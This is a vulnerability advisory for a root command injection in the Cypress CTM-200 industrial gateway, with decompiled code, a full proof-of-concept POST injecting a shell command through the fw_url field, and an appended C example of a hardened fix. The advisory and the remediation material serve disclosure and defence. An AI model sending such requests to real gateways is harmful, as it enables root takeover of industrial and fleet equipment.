# Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection
# Date: 21.09.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.cypress.bc.ca

Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection


Vendor: Cypress Solutions Inc.
Product web page: https://www.cypress.bc.ca
Affected version: 2.7.1.5659
                  2.0.5.3356-184

Summary: CTM-200 is the industrial cellular wireless gateway for fixed
and mobile applications. The CTM-200 is a Linux based platform powered
by an ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard
features make the CTM-200 ideal for mobile fleet applications or fixed
site office and SCADA communications.

Desc: The CTM-200 wireless gateway suffers from an authenticated,
semi-blind OS command injection vulnerability. It can be exploited to
inject and execute arbitrary shell commands as the root user through
the 'ctm-config-upgrade.sh' script, which passes the 'fw_url' POST
parameter unsanitized as the argument of 'cmd upgradefw'. 'cmd' hands
the call to the /usr/bin/cmdmain ELF binary via execv(); there
make_wget_url() builds a wget command line from the parameter and
ctmsys() executes that line through the shell.

================================================================================================

/www/cgi-bin/webif/ctm-config-upgrade.sh:
-----------------------------------------

136:if ! empty "$FORM_install_fw_url"; then
137:  echo "</pre>"
138:  echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>"
139:  cmd upgradefw "$FORM_fw_url"
140:  unset FORM_install_fw_url FORM_submit
141:  echo "</pre><br />Done."
142:fi

==================================================================

cmdmain (ELF):

  memset(&DAT_0003bd1c,0,0x80);
  make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c);
  /* untrusted fw_url is concatenated into a command line and passed to ctmsys() */
  sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
          *(undefined4 *)(iParm2 + 8));
  ctmsys(local_184);
  sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));
  iVar3 = ctm_fopen(local_184,"r");
  if (iVar3 == 0) {
    uVar5 = *(undefined4 *)(iParm2 + 8);
    __s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";
    goto LAB_0001f4a8;
  }
  ctm_fclose();
  memset(local_184,0,0x100);
  /* same pattern a second time for the .md5 companion file */
  sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),
          *(undefined4 *)(iParm2 + 8));
  ctmsys(local_184);

=================================================================

cmd (ELF):

  while (sVar1 = strlen(__s2), uVar7 < sVar1) {
    __s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);
    __s2 = *ppcVar8;
    uVar7 = uVar7 + 1;
  }
  /* little-endian stack words below spell the execv() path "/usr/bin/cmds/cmdmain" */
  uStack180 = 0x7273752f;
  uStack176 = 0x6e69622f;
  uStack172 = 0x646d632f;
  uStack168 = 0x6d632f73;
  uStack164 = 0x69616d64;
  uStack160 = 0x6e;
  uStack159 = 0;
  iVar2 = execv((char *)&uStack180,ppcParm2);

================================================================================================

Tested on: GNU/Linux 2.6.32.25 (arm4tl)
           BusyBox v1.15.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5687
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php


21.09.2021

--


PoC POST request:
-----------------

POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1
Host: 192.168.1.100
Connection: keep-alive
Content-Length: 611
Cache-Control: max-age=0
Authorization: Basic YWRtaW46Q2hhbWVsZW9u
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cookie: style=null
sec-gpc: 1

------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="submit"

1
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="upgradefile"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="fw_url"

id
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="install_fw_url"

Start Firmware Upgrade from URL
------WebKitFormBoundaryZlABvwQnpLtpe9mM
Content-Disposition: form-data; name="pkgurl"


------WebKitFormBoundaryZlABvwQnpLtpe9mM--


Response:
---------

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...
...
Firmware Management
Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!
Saving configuration ...
downloading firmware image: gid=0(root)/uid=0(root).tar
found image: extracting image files
Verifying checksum of downloaded firmware image
Image checksum failed
OK
Done.
...
...
</div>
<br />
<fieldset id="save">
<legend><strong>Proceed Changes</strong></legend>
<div class="page-save"><input id="savebutton" type="submit" name="action" value="Save Changes to Page" /></div>
<ul class="apply">
<li><a href="config.sh?mode=save&cat=Config&prev=/cgi-bin/webif/ctm-config-upgrade.sh" rel="lightbox" >» Save Configuration «</a></li>
</ul>
</fieldset>
</form>
<hr />
<div id="footer">
<h3>X-Wrt</h3>
<em>End user extensions for OpenWrt</em>
</div>
</div> <!-- End #container -->
</body>
</html>
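The root cause in the cmdmain decompile above is the sprintf()+ctmsys() pattern: the POST value is spliced into a command line that a shell then parses. The following C is an added example, not code from the advisory or from the CTM-200 firmware. It mirrors the visible format string to show what reaches the shell, and beside it the fix a defender would expect: an allow-list validator for the URL, a bounded output file name under /tmp, and an argv vector suited to execv()-style invocation of wget so the untrusted value is never parsed by a shell. All function names (build_shell_cmd_vulnerable, validate_fw_url, safe_fw_basename, build_wget_argv), the "wget " prefix standing in for whatever make_wget_url() writes, and the sample URLs are this example's own assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define FW_NAME_MAX 64

/* Mirrors the decompiled sprintf in cmdmain: prefix + fw_url + " -O /tmp/" + fw_url.
 * The result is the string ctmsys() would hand to the shell; this example only builds
 * it and never executes it. Returns 0 on success, -1 if it would not fit. */
int build_shell_cmd_vulnerable(char *out, size_t outlen, const char *prefix, const char *fw_url)
{
    int n = snprintf(out, outlen, "%s%s -O /tmp/%s", prefix, fw_url, fw_url);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Allow-list check for the firmware URL: http(s) scheme followed by URL-safe characters
 * only. Everything a shell interprets (space, ; | & $ ` quotes, newlines, redirections)
 * is outside the list and therefore rejected. The list is deliberately tight; widen it
 * only for characters the deployment actually needs. Returns 1 if acceptable, else 0. */
int validate_fw_url(const char *url)
{
    const char *rest;
    if (strncmp(url, "http://", 7) == 0)       rest = url + 7;
    else if (strncmp(url, "https://", 8) == 0) rest = url + 8;
    else return 0;
    if (*rest == '\0') return 0;
    for (const char *p = rest; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (isalnum(c) || strchr("-._~:/?=%", c) != NULL) continue;
        return 0;
    }
    return 1;
}

/* Derive a safe output file name: the last path component (query/fragment ignored),
 * restricted to [A-Za-z0-9._-], never "." or "..", bounded in length.
 * Returns 0 on success, -1 otherwise. */
int safe_fw_basename(const char *url, char *out, size_t outlen)
{
    size_t path_len = strcspn(url, "?#");          /* stop at query or fragment */
    const char *end = url + path_len;
    const char *base = end;
    while (base > url && base[-1] != '/') base--;  /* walk back to the last '/' */
    size_t len = (size_t)(end - base);
    if (len == 0 || len > FW_NAME_MAX || len >= outlen) return -1;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)base[i];
        if (!isalnum(c) && c != '-' && c != '_' && c != '.') return -1;
    }
    if ((len == 1 && base[0] == '.') || (len == 2 && base[0] == '.' && base[1] == '.')) return -1;
    memcpy(out, base, len);
    out[len] = '\0';
    return 0;
}

/* Hardened replacement for the sprintf+ctmsys() pattern: validates the URL, derives a
 * fixed output path under /tmp, and fills an argv vector for execv()-style execution of
 * wget, so the untrusted value is a single argument and never parsed by a shell.
 * args must have room for 5 pointers; outpath receives "/tmp/<name>".
 * Returns the argument count (4) on success, -1 if the input is rejected. */
int build_wget_argv(const char *fw_url, char *outpath, size_t outpath_len, char *args[])
{
    char name[FW_NAME_MAX + 1];
    if (!validate_fw_url(fw_url)) return -1;
    if (safe_fw_basename(fw_url, name, sizeof name) != 0) return -1;
    int n = snprintf(outpath, outpath_len, "/tmp/%s", name);
    if (n < 0 || (size_t)n >= outpath_len) return -1;
    args[0] = "wget";
    args[1] = (char *)fw_url;
    args[2] = "-O";
    args[3] = outpath;
    args[4] = NULL;
    return 4;
}

int main(void)
{
    /* constructed sample inputs: a well-formed URL and the non-URL value from the PoC */
    const char *good = "http://192.0.2.10/fw/ctm-2.7.1.tar";
    const char *bad  = "id";
    char cmd[256], path[128];
    char *args[5];

    /* "wget " is a constructed stand-in for the prefix make_wget_url() produces */
    if (build_shell_cmd_vulnerable(cmd, sizeof cmd, "wget ", bad) == 0)
        printf("vulnerable path: shell would parse \"%s\"\n", cmd);
    if (build_wget_argv(good, path, sizeof path, args) > 0)
        printf("hardened path: %s %s %s %s\n", args[0], args[1], args[2], args[3]);
    if (build_wget_argv(bad, path, sizeof path, args) < 0)
        printf("hardened path: rejected \"%s\"\n", bad);
    return 0;
}
```

The design point is that validation alone is not the fix; the structural change is moving from a shell-parsed command string to an argument vector, which makes metacharacters inert even if the allow-list is later loosened. The basename routine also closes the second issue visible in the decompile, where the same untrusted value chooses the file name under /tmp.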